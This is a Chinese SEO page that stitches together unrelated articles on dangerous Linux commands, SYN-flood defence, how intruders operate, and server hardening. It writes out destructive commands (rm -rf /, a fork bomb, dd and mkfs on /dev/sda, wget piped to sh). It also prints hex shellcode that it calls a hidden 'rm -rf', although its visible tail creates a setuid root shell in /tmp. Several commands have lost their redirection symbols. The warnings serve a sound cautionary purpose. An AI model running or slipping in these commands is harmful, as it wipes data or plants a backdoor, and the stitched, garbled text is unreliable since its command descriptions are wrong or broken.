linux查找黑客命令 黑客命令行

Linux中最危險(xiǎn)的10個(gè)命令

Linux中最危險(xiǎn)的10個(gè)命令

成都創(chuàng)新互聯(lián)公司專注于企業(yè)成都全網(wǎng)營(yíng)銷推廣、網(wǎng)站重做改版、蘭溪網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5高端網(wǎng)站建設(shè)、商城系統(tǒng)網(wǎng)站開(kāi)發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)公司、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁(yè)設(shè)計(jì)等建站業(yè)務(wù),價(jià)格優(yōu)惠性價(jià)比高,為蘭溪等各大城市提供網(wǎng)站開(kāi)發(fā)制作服務(wù)。

對(duì)于編程人員或或者Linux系統(tǒng)管理員來(lái)說(shuō),操作Linux系統(tǒng)最常見(jiàn)的方法就是使用命令行。當(dāng)然,Linux命令行佷有用、很高效,但有時(shí)候也很危險(xiǎn),尤其是在你誤操作或者不確定你自己在正在做什么的時(shí)候。下面我就為大家盤點(diǎn)最危險(xiǎn)是10個(gè)命令,一起來(lái)看看吧!

當(dāng)然,以下命令通常都是在root權(quán)限下才能將愚蠢發(fā)揮到無(wú)可救藥;在普 通用戶身份下,破壞的只是自己的一畝三分地。

1. rm -rf 命令

rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點(diǎn)的敲錯(cuò)或無(wú)知都可能導(dǎo)致不可恢復(fù)的系統(tǒng)崩壞。下列是一些rm 命令的選項(xiàng)。

rm 命令在Linux下通常用來(lái)刪除文件。

rm -r 命令遞歸的刪除文件夾,甚至是空的文件夾。(譯注:個(gè)人認(rèn)為此處應(yīng)該是說(shuō)錯(cuò)了,從常識(shí)看,應(yīng)該是“甚至是非空的文件夾”)

rm -f 命令能不經(jīng)過(guò)詢問(wèn)直接刪除‘只讀文件’。(譯注:Linux下刪除文件并不在乎該文件是否是只讀的,而只是在意其父目錄是否有寫權(quán)限。所以,-f這個(gè)參數(shù) 只是表示不必一個(gè)個(gè)刪除確認(rèn),而是一律悄悄刪除。另外,原始的rm命令其實(shí)也是沒(méi)有刪除提示的,只是一般的發(fā)行版都會(huì)將rm通過(guò)別名的方式增加-i參數(shù)來(lái) 要求刪除確認(rèn),而-f則抑制了這個(gè)提示。)

rm -rf / : 強(qiáng)制刪除根目錄下所有東東。(就是說(shuō)刪除完畢后,什么也沒(méi)有了。。。)

rm -rf *: 強(qiáng)制刪除當(dāng)前目錄的所有文件。

rm -rf . : 強(qiáng)制刪除當(dāng)前文件夾及其子文件夾。

從 現(xiàn)在起,當(dāng)你要執(zhí)行rm -rf命令時(shí)請(qǐng)留心一點(diǎn)。我們可以在“.bashrc”文件對(duì)‘rm‘命令創(chuàng)建rm -i的別名,來(lái)預(yù)防用 ‘rm‘命令刪除文件時(shí)的事故,它會(huì)要求你確認(rèn)每一個(gè)刪除請(qǐng)求。(譯注:大多數(shù)發(fā)行版已經(jīng)這樣做了,如果還沒(méi)有,請(qǐng)這樣做,并在使用-f參數(shù)前一定考慮好 你在做什么!譯者本人有著血淚的教訓(xùn)啊。)

2. :(){:|:};: 命令

這就是個(gè)fork 炸彈的實(shí)例。具體操作是通過(guò)定義一個(gè)名為 ‘:‘的函數(shù),它會(huì)調(diào)用自己兩次,一次在前臺(tái)另一次運(yùn)行在后臺(tái)。它會(huì)反復(fù)的執(zhí)行下去直到系統(tǒng)崩潰。

:(){:|:};:

哦?你確認(rèn)你要試試么?千萬(wàn)別在公司正式的服務(wù)器上實(shí)驗(yàn)啊~~

3. 命令  /dev/sda

上列命令會(huì)將某個(gè)‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會(huì)將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù),從而導(dǎo)致整個(gè)塊設(shè)備的數(shù)據(jù)丟失。

4. mv 文件夾 /dev/null

這 個(gè)命令會(huì)移動(dòng)某個(gè)‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個(gè)特殊的文件,所有寫入它的數(shù)據(jù)都會(huì)被清除,然后返回寫操作成功。(譯注:這就是黑洞啊。當(dāng)然,要說(shuō)明的是,通過(guò)將文件夾移動(dòng)到黑洞,并不能阻止 數(shù)據(jù)恢復(fù)軟件的救贖,所以,真正的`徹底毀滅,需要采用專用的軟件或者手法來(lái)完成——我知道你肯定有些東西想刪除得干干凈凈的。)

# mv /home/user/* /dev/null

上列命令會(huì)將User目錄所有內(nèi)容移動(dòng)到/dev/null,這意味著所有東西都被‘卷入’黑洞 (null)之中。

5. wget -O- | sh

上列命令會(huì)從一個(gè)(也許是)惡意源下載一個(gè)腳本并執(zhí)行。Wget命令會(huì)下載這個(gè)腳本,而sh會(huì)(無(wú)條件的)執(zhí)行下載下來(lái)的腳本。

注意: 你應(yīng)該時(shí)刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注:所以,你真的知道你在做什么嗎?當(dāng)遇到這種需要是,我的做法是,先wget下來(lái),然后我去讀一讀其中到底寫了些什么,然后考慮是否執(zhí)行。)

6. mkfs.ext3 /dev/sda

上列命令會(huì)格式化塊設(shè)備‘sda’,你無(wú)疑知道在執(zhí)行上列命令后你的塊設(shè)備(硬盤驅(qū) 動(dòng)器)會(huì)被格式化,嶄新的!沒(méi)有任何數(shù)據(jù),直接讓你的系統(tǒng)達(dá)到不可恢復(fù)的階段。(譯注:通常不會(huì)直接使用/dev/sda這樣的設(shè)備,除非是作為raw設(shè) 備使用,一般都需要將sda分成類似sda1、sda2這樣的分區(qū)后才使用。當(dāng)然,無(wú)論你使用sda還是sda1,這樣對(duì)塊設(shè)備或分區(qū)進(jìn)行mkfs都是毀 滅性的,上面的數(shù)據(jù)都會(huì)被蒸發(fā)了。)

7. file

上列命令常用來(lái)清空文件內(nèi)容(譯注:通常也用于記錄命令輸出。 不過(guò)請(qǐng)?jiān)趫?zhí)行前,確認(rèn)輸出的文件是空的或者還不存在,否則原來(lái)的文件可真是恢復(fù)不了了——連數(shù)據(jù)恢復(fù)軟件都未必能幫助你了。另外,我想你可能真正想用的是 “”,即累加新的輸出到文件,而不是刷新那個(gè)文件。)。如果用上列執(zhí)行時(shí)輸入錯(cuò)誤或無(wú)知的輸入類似 “xt.conf” 的命令會(huì)覆蓋配置文件或其他任何的系統(tǒng)配置文件。

8. ^foo^bar

這個(gè)命令在“鮮為人知而又實(shí)用的 Linux 命令大全:”中描述過(guò),用來(lái)編輯先前運(yùn)行的命令而無(wú)需重打整個(gè)命令。但當(dāng)用foobar命令時(shí)如果你沒(méi)有徹底檢查改變?cè)济畹娘L(fēng)險(xiǎn),這可能導(dǎo)致真正的麻煩。(譯注:事實(shí)上,這種小技巧是譯者認(rèn)為的,少數(shù)史前時(shí)代遺留下來(lái)的無(wú)用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令會(huì)向塊設(shè)備sda寫入隨機(jī)的垃圾文件從而擦出數(shù)據(jù)。當(dāng)然!你的系統(tǒng)可能陷入混亂和不可恢復(fù)的狀態(tài)。(譯注:記得上面說(shuō)過(guò)mv到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個(gè)命令就是給了你一個(gè)徹底刪除的方法!當(dāng)然為了保險(xiǎn)起見(jiàn),你可以覆寫多次。)

10. 隱藏命令

下面的命令其實(shí)就是上面第一個(gè)命令 (rm -rf)。這里的代碼是隱藏在十六進(jìn)制里的,一個(gè)無(wú)知的用戶可能就會(huì)被愚弄。在終端里運(yùn)行下面命令可能會(huì)擦除你的根分區(qū)。

這個(gè)命令表明通常真正的危險(xiǎn)是隱藏的,不會(huì)被輕易的檢測(cè)到。你必須時(shí)刻留心你在做什么結(jié)果會(huì)怎樣。不要編譯/運(yùn)行從未知來(lái)源的代碼。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

注意: 不要在你的或你的同學(xué)或?qū)W校的電腦里的Linux終端或Shell執(zhí)行以上的任何一個(gè)命令,因?yàn)檫@將導(dǎo)致數(shù)據(jù)丟失或者系統(tǒng)崩潰。如果你想測(cè)試它們,請(qǐng)?jiān)谔摂M機(jī)上運(yùn)行。

;

黑客基礎(chǔ)命令,DOS命令,以及UNIX / Linux是什么?(具體點(diǎn))

樓上的答案已經(jīng)很不錯(cuò)了,我只是想告訴LZ,瞬間學(xué)會(huì)Linux命令是不可能的。這些東西要慢慢來(lái)。

如何檢查linux下的哪個(gè)進(jìn)程大量發(fā)起syn ack

Linux syn攻擊是一種黑客攻擊,如何處理和減少這種攻擊是系統(tǒng)管理員比較重要的工作,怎么才能出色的完成這項(xiàng)工作,希望通過(guò)本文能給你一啟發(fā),讓你在以后工作中能輕松完成抵御Linux syn攻擊的任務(wù)。

虛擬主機(jī)服務(wù)商在運(yùn)營(yíng)過(guò)程中可能會(huì)受到黑客攻擊,常見(jiàn)的攻擊方式有SYN,DDOS等。通過(guò)更換IP,查找被攻擊的站點(diǎn)可能避開(kāi)攻擊,但是中斷服務(wù)的時(shí)間比較長(zhǎng)。比較徹底的解決方法是添置硬件防火墻。不過(guò),硬件防火墻價(jià)格比較昂貴??梢钥紤]利用Linux 系統(tǒng)本身提供的防火墻功能來(lái)防御。

抵御SYN SYN攻擊是利用TCP/IP協(xié)議3次握手的原理,發(fā)送大量的建立連接的網(wǎng)絡(luò)包,但不實(shí)際建立連接,最終導(dǎo)致被攻擊服務(wù)器的網(wǎng)絡(luò)隊(duì)列被占滿,無(wú)法被正常用戶訪問(wèn)。

Linux內(nèi)核提供了若干SYN相關(guān)的配置,用命令: sysctl -a | grep syn 看到:

net.ipv4.tcp_max_syn_backlog = 1024 net.ipv4.tcp_syncookies = 0

net.ipv4.tcp_synack_retries = 5 net.ipv4.tcp_syn_retries = 5

tcp_max_syn_backlog是SYN隊(duì)列的長(zhǎng)度,tcp_syncookies是一個(gè)開(kāi)關(guān),是否打開(kāi)SYN Cookie 功能,該功能可以防止部分SYN攻擊。tcp_synack_retries和tcp_syn_retries定義SYN 的重試次數(shù)。加大SYN隊(duì)列長(zhǎng)度可以容納更多等待連接的網(wǎng)絡(luò)連接數(shù),打開(kāi)SYN Cookie功能可以阻止部分 SYN攻擊,降低重試次數(shù)也有一定效果。

調(diào)整上述設(shè)置的方法是:

增加SYN隊(duì)列長(zhǎng)度到2048:

sysctl -w net.ipv4.tcp_max_syn_backlog=2048

打開(kāi)SYN COOKIE功能:

sysctl -w net.ipv4.tcp_syncookies=1

降低重試次數(shù):

sysctl -w net.ipv4.tcp_synack_retries=3 sysctl -w net.ipv4.tcp_syn_retries=3

為了系統(tǒng)重啟動(dòng)時(shí)保持上述配置,可將上述命令加入到/etc/rc.d/rc.local文件中。

防止同步包洪水(Sync Flood)

# iptables -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT

也有人寫作

#iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT

--limit 1/s 限制syn并發(fā)數(shù)每秒1次,可以根據(jù)自己的需要修改

防止各種端口掃描

# iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT

Ping洪水攻擊(Ping of Death)

# iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT

到這里L(fēng)inux syn攻擊問(wèn)題的處理就可以解決了。

電腦被黑客攻擊了。怎么處理

黑客入侵電腦的方式主要有如下: 1、隱藏黑客的位置 : 典型的黑客會(huì)使用如下技術(shù)隱藏他們真實(shí)的IP地址:

利用被侵入的主機(jī)作為跳板;

在安裝Windows 的計(jì)算機(jī)內(nèi)利用Wingate 軟件作為跳板;利用配置不當(dāng)?shù)腜roxy作為跳板。 更老練的黑客會(huì)使用電話轉(zhuǎn)接技術(shù)隱蔽自己。他們常用的手法有:利用800 號(hào)電話的私人轉(zhuǎn)接服務(wù)聯(lián)接ISP, 然后再盜用他人的賬號(hào)上網(wǎng);通過(guò)電話聯(lián)接一臺(tái)主機(jī),再經(jīng)由主機(jī)進(jìn)入Internet。 使用這種在電話網(wǎng)絡(luò)上的"三級(jí)跳"方式進(jìn)入Internet 特別難于跟蹤。理論上,黑客可能來(lái)自世界任何一個(gè)角落。如果黑客使用800號(hào)撥號(hào)上網(wǎng),他更不用擔(dān)心上網(wǎng)費(fèi)用。 2、網(wǎng)絡(luò)探測(cè)和資料收集: 黑客利用以下的手段得知位于內(nèi)部網(wǎng)和外部網(wǎng)的主機(jī)名。 使用nslookup 程序的ls命令;

通過(guò)訪問(wèn)公司主頁(yè)找到其他主機(jī);

閱讀FTP服務(wù)器上的文擋;

聯(lián)接至mailserver 并發(fā)送 expn請(qǐng)求;

Finger 外部主機(jī)上的用戶名。 在尋找漏洞之前,黑客會(huì)試圖搜集足夠的信息以勾勒出整個(gè)網(wǎng)絡(luò)的布局。利用上述操作得到的信息,黑客很容易列出所有的主機(jī),并猜測(cè)它們之間的關(guān)系。 3、找出被信任的主機(jī): 黑客總是尋找那些被信任的主機(jī)。這些主機(jī)可能是管理員使用的機(jī)器,或是一臺(tái)被認(rèn)為是很安全的服務(wù)器。 下一步,他會(huì)檢查所有運(yùn)行nfsd或mountd的主機(jī)的NFS輸出。往往這些主機(jī)的一些關(guān)鍵目錄(如/usr/bin、/etc和/home)可以被那臺(tái)被信任的主機(jī)mount。

Finger daemon 也可以被用來(lái)尋找被信任的主機(jī)和用戶,因?yàn)橛脩艚?jīng)常從某臺(tái)特定的主機(jī)上登錄。 黑客還會(huì)檢查其他方式的信任關(guān)系。比如,他可以利用CGI 的漏洞,讀取/etc/hosts.allow 文件等等。 分析完上述的各種檢查結(jié)果,就可以大致了解主機(jī)間的信任關(guān)系。下一步, 就是探測(cè)這些被信任的主機(jī)哪些存在漏洞,可以被遠(yuǎn)程侵入。 4、找出有漏洞的網(wǎng)絡(luò)成員: 當(dāng)黑客得到公司內(nèi)外部主機(jī)的清單后,他就可以用一些Linux 掃描器程序?qū)ふ疫@些主機(jī)的漏洞。黑客一般尋找網(wǎng)絡(luò)速度很快的Linux 主機(jī)運(yùn)行這些掃描程序。 所有這些掃描程序都會(huì)進(jìn)行下列檢查:

TCP 端口掃描;

RPC 服務(wù)列表;

NFS 輸出列表;

共享(如samba、netbiox)列表;

缺省賬號(hào)檢查;

Sendmail、IMAP、POP3、RPC status 和RPC mountd 有缺陷版本檢測(cè)。 進(jìn)行完這些掃描,黑客對(duì)哪些主機(jī)有機(jī)可乘已胸有成竹了。

如果路由器兼容SNMP協(xié)議,有經(jīng)驗(yàn)的黑客還會(huì)采用攻擊性的SNMP 掃描程序進(jìn)行嘗試, 或者使用"蠻力式"程序去猜測(cè)這些設(shè)備的公共和私有community strings。

5、利用漏洞: 現(xiàn)在,黑客找到了所有被信任的外部主機(jī),也已經(jīng)找到了外部主機(jī)所有可能存在的漏洞。下一步就該開(kāi)始動(dòng)手入侵主機(jī)了。 黑客會(huì)選擇一臺(tái)被信任的外部主機(jī)進(jìn)行嘗試。一旦成功侵入,黑客將從這里出發(fā),設(shè)法進(jìn)入公司內(nèi)部的網(wǎng)絡(luò)。但這種方法是否成功要看公司內(nèi)部主機(jī)和外部主機(jī)間的過(guò)濾策略了。攻擊外部主機(jī)時(shí),黑客一般是運(yùn)行某個(gè)程序,利用外部主機(jī)上運(yùn)行的有漏洞的daemon竊取控制權(quán)。有漏洞的daemon包括Sendmail、IMAP、POP3各個(gè)漏洞的版本,以及RPC服務(wù)中諸如statd、mountd、pcnfsd等。有時(shí),那些攻擊程序必須在與被攻擊主機(jī)相同的平臺(tái)上進(jìn)行編譯。 6、獲得控制權(quán): 黑客利用daemon的漏洞進(jìn)入系統(tǒng)后會(huì)做兩件事:清除記錄和留下后門。 他會(huì)安裝一些后門程序,以便以后可以不被察覺(jué)地再次進(jìn)入系統(tǒng)。大多數(shù)后門程序是預(yù)先編譯好的,只需要想辦法修改時(shí)間和權(quán)限就可以使用,甚至于新文件的大小都和原有文件一樣。黑客一般會(huì)使用rcp 傳遞這些文件,以便不留下FTP記錄。一旦確認(rèn)自己是安全的,黑客就開(kāi)始侵襲公司的整個(gè)內(nèi)部網(wǎng)。 7.竊取網(wǎng)絡(luò)資源和特權(quán): 黑客找到攻擊目標(biāo)后,會(huì)繼續(xù)下一步的攻擊,步驟如下:

(1)下載敏感信息 (2)攻擊其他被信任的主機(jī)和網(wǎng)絡(luò) (3)安裝sniffers (4)癱瘓網(wǎng)絡(luò)

如何檢查L(zhǎng)inux系統(tǒng)服務(wù)器的安全性

但由于該操作系統(tǒng)是一個(gè)多用戶操作系統(tǒng),黑客們?yōu)榱嗽诠糁须[藏自己,往往會(huì)選擇 Linux作為首先攻擊的對(duì)象。那么,作為一名Linux用戶,我們?cè)撊绾瓮ㄟ^(guò)合理的方法來(lái)防范Linux的安全呢?下面筆者搜集和整理了一些防范 Linux安全的幾則措施,現(xiàn)在把它們貢獻(xiàn)出來(lái),懇請(qǐng)各位網(wǎng)友能不斷補(bǔ)充和完善。 1、禁止使用Ping命令Ping命令是計(jì)算機(jī)之間進(jìn)行相互檢測(cè)線路完好的一個(gè)應(yīng)用程序,計(jì)算機(jī)間交流數(shù)據(jù)的傳輸沒(méi)有 經(jīng)過(guò)任何的加密處理,因此我們?cè)谟胮ing命令來(lái)檢測(cè)某一個(gè)服務(wù)器時(shí),可能在因特網(wǎng)上存在某個(gè)非法分子,通過(guò)專門的黑客程序把在網(wǎng)絡(luò)線路上傳輸?shù)男畔⒅型?竊取,并利用偷盜過(guò)來(lái)的信息對(duì)指定的服務(wù)器或者系統(tǒng)進(jìn)行攻擊,為此我們有必要在Linux系統(tǒng)中禁止使用Linux命令。在Linux里,如果要想使 ping沒(méi)反應(yīng)也就是用來(lái)忽略icmp包,因此我們可以在Linux的命令行中輸入如下命令: echo 1 /proc/sys/net/ipv4/icmp_echo_igore_all 如果想恢復(fù)使用ping命令,就可以輸入 echo 0 /proc/sys/net/ipv4/icmp_echo_igore_all2、注意對(duì)系統(tǒng)及時(shí)備份為了防止系統(tǒng)在使用的過(guò)程中發(fā)生以外情況而難以正常運(yùn)行,我們應(yīng)該對(duì)Linux完好的系統(tǒng)進(jìn) 行備份,最好是在一完成Linux系統(tǒng)的安裝任務(wù)后就對(duì)整個(gè)系統(tǒng)進(jìn)行備份,以后可以根據(jù)這個(gè)備份來(lái)驗(yàn)證系統(tǒng)的完整性,這樣就可以發(fā)現(xiàn)系統(tǒng)文件是否被非法修 改過(guò)。如果發(fā)生系統(tǒng)文件已經(jīng)被破壞的情況,也可以使用系統(tǒng)備份來(lái)恢復(fù)到正常的狀態(tài)。備份信息時(shí),我們可以把完好的系統(tǒng)信息備份在CD-ROM光盤上,以后 可以定期將系統(tǒng)與光盤內(nèi)容進(jìn)行比較以驗(yàn)證系統(tǒng)的完整性是否遭到破壞。如果對(duì)安全級(jí)別的要求特別高,那么可以將光盤設(shè)置為可啟動(dòng)的并且將驗(yàn)證工作作為系統(tǒng)啟 動(dòng)過(guò)程的一部分。這樣只要可以通過(guò)光盤啟動(dòng),就說(shuō)明系統(tǒng)尚未被破壞過(guò)。 3、改進(jìn)登錄服務(wù)器將系統(tǒng)的登錄服務(wù)器移到一個(gè)單獨(dú)的機(jī)器中會(huì)增加系統(tǒng)的安全級(jí)別,使用一個(gè)更安全的登錄服務(wù)器 來(lái)取代Linux自身的登錄工具也可以進(jìn)一步提高安全。在大的Linux網(wǎng)絡(luò)中,最好使用一個(gè)單獨(dú)的登錄服務(wù)器用于syslog服務(wù)。它必須是一個(gè)能夠滿 足所有系統(tǒng)登錄需求并且擁有足夠的磁盤空間的服務(wù)器系統(tǒng),在這個(gè)系統(tǒng)上應(yīng)該沒(méi)有其它的服務(wù)運(yùn)行。更安全的登錄服務(wù)器會(huì)大大削弱入侵者透過(guò)登錄系統(tǒng)竄改日志 文件的能力。 4、取消Root命令歷史記錄在Linux下,系統(tǒng)會(huì)自動(dòng)記錄用戶輸入過(guò)的命令,而root用戶發(fā)出的命令往往具有敏感的 信息,為了保證安全性,一般應(yīng)該不記錄或者少記錄root的命令歷史記錄。為了設(shè)置系統(tǒng)不記錄每個(gè)人執(zhí)行過(guò)的命令,我們可以在Linux的命令行下,首先 用cd命令進(jìn)入到/etc命令,然后用編輯命令來(lái)打開(kāi)該目錄下面的profile文件,并在其中輸入如下內(nèi)容: HISTFILESIZE=0

HISTSIZE=0當(dāng)然,我們也可以直接在命令行中輸入如下命令: ln -s /dev/null ~/.bash_history5、為關(guān)鍵分區(qū)建立只讀屬性Linux的文件系統(tǒng)可以分成幾個(gè)主要的分區(qū),每個(gè)分區(qū)分別進(jìn)行不同的配置和安裝,一般情況 下至少要建立/、/usr/local、/var和/home等分區(qū)。/usr可以安裝成只讀并且可以被認(rèn)為是不可修改的。如果/usr中有任何文件發(fā)生 了改變,那么系統(tǒng)將立即發(fā)出安全報(bào)警。當(dāng)然這不包括用戶自己改變/usr中的內(nèi)容。/lib、/boot和/sbin的安裝和設(shè)置也一樣。在安裝時(shí)應(yīng)該盡 量將它們?cè)O(shè)置為只讀,并且對(duì)它們的文件、目錄和屬性進(jìn)行的任何修改都會(huì)導(dǎo)致系統(tǒng)報(bào)警。 當(dāng)然將所有主要的分區(qū)都設(shè)置為只讀是不可能的,有的分區(qū)如/var等,其自身的性質(zhì)就決定了不能將它們?cè)O(shè)置為只讀,但應(yīng)該不允許它具有執(zhí)行權(quán)限。 6、殺掉攻擊者的所有進(jìn)程假設(shè)我們從系統(tǒng)的日志文件中發(fā)現(xiàn)了一個(gè)用戶從我們未知的主機(jī)登錄,而且我們確定該用戶在這臺(tái) 主機(jī)上沒(méi)有相應(yīng)的帳號(hào),這表明此時(shí)我們正在受到攻擊。為了保證系統(tǒng)的安全被進(jìn)一步破壞,我們應(yīng)該馬上鎖住指定的帳號(hào),如果攻擊者已經(jīng)登錄到指定的系統(tǒng),我 們應(yīng)該馬上斷開(kāi)主機(jī)與網(wǎng)絡(luò)的物理連接。如有可能,我們還要進(jìn)一步查看此用戶的歷史記錄,再仔細(xì)查看一下其他用戶是否也已經(jīng)被假冒,攻擊者是否擁有有限權(quán) 限;最后應(yīng)該殺掉此用戶的所有進(jìn)程,并把此主機(jī)的IP地址掩碼加入到文件hosts.deny中。 7、改進(jìn)系統(tǒng)內(nèi)部安全機(jī)制我們可以通過(guò)改進(jìn)Linux操作系統(tǒng)的內(nèi)部功能來(lái)防止緩沖區(qū)溢出,從而達(dá)到增強(qiáng)Linux系 統(tǒng)內(nèi)部安全機(jī)制的目的,大大提高了整個(gè)系統(tǒng)的安全性。但緩沖區(qū)溢出實(shí)施起來(lái)是相當(dāng)困難的,因?yàn)槿肭终弑仨毮軌蚺袛酀撛诘木彌_區(qū)溢出何時(shí)會(huì)出現(xiàn)以及它在內(nèi)存 中的什么位置出現(xiàn)。緩沖區(qū)溢出預(yù)防起來(lái)也十分困難,系統(tǒng)管理員必須完全去掉緩沖區(qū)溢出存在的條件才能防止這種方式的攻擊。正因?yàn)槿绱?,許多人甚至包括 Linux Torvalds本人也認(rèn)為這個(gè)安全Linux補(bǔ)丁十分重要,因?yàn)樗乐沽怂惺褂镁彌_區(qū)溢出的攻擊。但是需要引起注意的是,這些補(bǔ)丁也會(huì)導(dǎo)致對(duì)執(zhí)行棧的 某些程序和庫(kù)的依賴問(wèn)題,這些問(wèn)題也給系統(tǒng)管理員帶來(lái)的新的挑戰(zhàn)。 8、對(duì)系統(tǒng)進(jìn)行跟蹤記錄為了能密切地監(jiān)視黑客的攻擊活動(dòng),我們應(yīng)該啟動(dòng)日志文件,來(lái)記錄系統(tǒng)的運(yùn)行情況,當(dāng)黑客在攻 擊系統(tǒng)時(shí),它的蛛絲馬跡都會(huì)被記錄在日志文件中的,因此有許多黑客在開(kāi)始攻擊系統(tǒng)時(shí),往往首先通過(guò)修改系統(tǒng)的日志文件,來(lái)隱藏自己的行蹤,為此我們必須限 制對(duì)/var/log文件的訪問(wèn),禁止一般權(quán)限的用戶去查看日志文件。當(dāng)然,系統(tǒng)中內(nèi)置的日志管理程序功能可能不是太強(qiáng),我們應(yīng)該采用專門的日志程序,來(lái) 觀察那些可疑的多次連接嘗試。另外,我們還要小心保護(hù)好具有根權(quán)限的密碼和用戶,因?yàn)楹诳鸵坏┲懒诉@些具有根權(quán)限的帳號(hào)后,他們就可以修改日志文件來(lái)隱 藏其蹤跡了。 9、使用專用程序來(lái)防范安全有時(shí),我們通過(guò)人工的方法來(lái)監(jiān)視系統(tǒng)的安全比較麻煩,或者是不周密,因此我們還可以通過(guò)專業(yè) 程序來(lái)防范系統(tǒng)的安全,目前最典型的方法為設(shè)置陷井和設(shè)置蜜罐兩種方法。所謂陷井就是激活時(shí)能夠觸發(fā)報(bào)警事件的軟件,而蜜罐(honey pot)程序是指設(shè)計(jì)來(lái)引誘有入侵企圖者觸發(fā)專門的報(bào)警的陷井程序。通過(guò)設(shè)置陷井和蜜罐程序,一旦出現(xiàn)入侵事件系統(tǒng)可以很快發(fā)出報(bào)警。在許多大的網(wǎng)絡(luò)中, 一般都設(shè)計(jì)有專門的陷井程序。陷井程序一般分為兩種:一種是只發(fā)現(xiàn)入侵者而不對(duì)其采取報(bào)復(fù)行動(dòng),另一種是同時(shí)采取報(bào)復(fù)行動(dòng)。 10、將入侵消滅在萌芽狀態(tài)入侵者進(jìn)行攻擊之前最常做的一件事情就是端號(hào)掃瞄,如果能夠及時(shí)發(fā)現(xiàn)和阻止入侵者的端號(hào)掃瞄 行為,那么可以大大減少入侵事件的發(fā)生率。反應(yīng)系統(tǒng)可以是一個(gè)簡(jiǎn)單的狀態(tài)檢查包過(guò)濾器,也可以是一個(gè)復(fù)雜的入侵檢測(cè)系統(tǒng)或可配置的防火墻。我們可以采用諸 如Abacus Port Sentry這樣專業(yè)的工具,來(lái)監(jiān)視網(wǎng)絡(luò)接口并且與防火墻交互操作,最終達(dá)到關(guān)閉端口掃瞄攻擊的目的。當(dāng)發(fā)生正在進(jìn)行的端口掃瞄時(shí),Abacus Sentry可以迅速阻止它繼續(xù)執(zhí)行。但是如果配置不當(dāng),它也可能允許敵意的外部者在你的系統(tǒng)中安裝拒絕服務(wù)攻擊。正確地使用這個(gè)軟件將能夠有效地防止對(duì) 端號(hào)大量的并行掃瞄并且阻止所有這樣的入侵者。 11、嚴(yán)格管理好口令前面我們也曾經(jīng)說(shuō)到過(guò),黑客一旦獲取具有根權(quán)限的帳號(hào)時(shí),就可以對(duì)系統(tǒng)進(jìn)行任意的破壞和攻 擊,因此我們必須保護(hù)好系統(tǒng)的操作口令。通常用戶的口令是保存在文件/etc/passwd文件中的,盡管/etc/passwd是一個(gè)經(jīng)過(guò)加密的文件, 但黑客們可以通過(guò)許多專用的搜索方法來(lái)查找口令,如果我們的口令選擇不當(dāng),就很容易被黑客搜索到。因此,我們一定要選擇一個(gè)確保不容易被搜索的口令。另外,我們最好能安裝一個(gè)口令過(guò)濾工具,并借用該工具來(lái)幫助自己檢查設(shè)置的口令是否耐得住攻擊。

網(wǎng)站題目:linux查找黑客命令 黑客命令行
網(wǎng)頁(yè)鏈接:http://muchs.cn/article32/hphssc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供做網(wǎng)站、外貿(mào)建站、商城網(wǎng)站、企業(yè)建站用戶體驗(yàn)、搜索引擎優(yōu)化

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

手機(jī)網(wǎng)站建設(shè)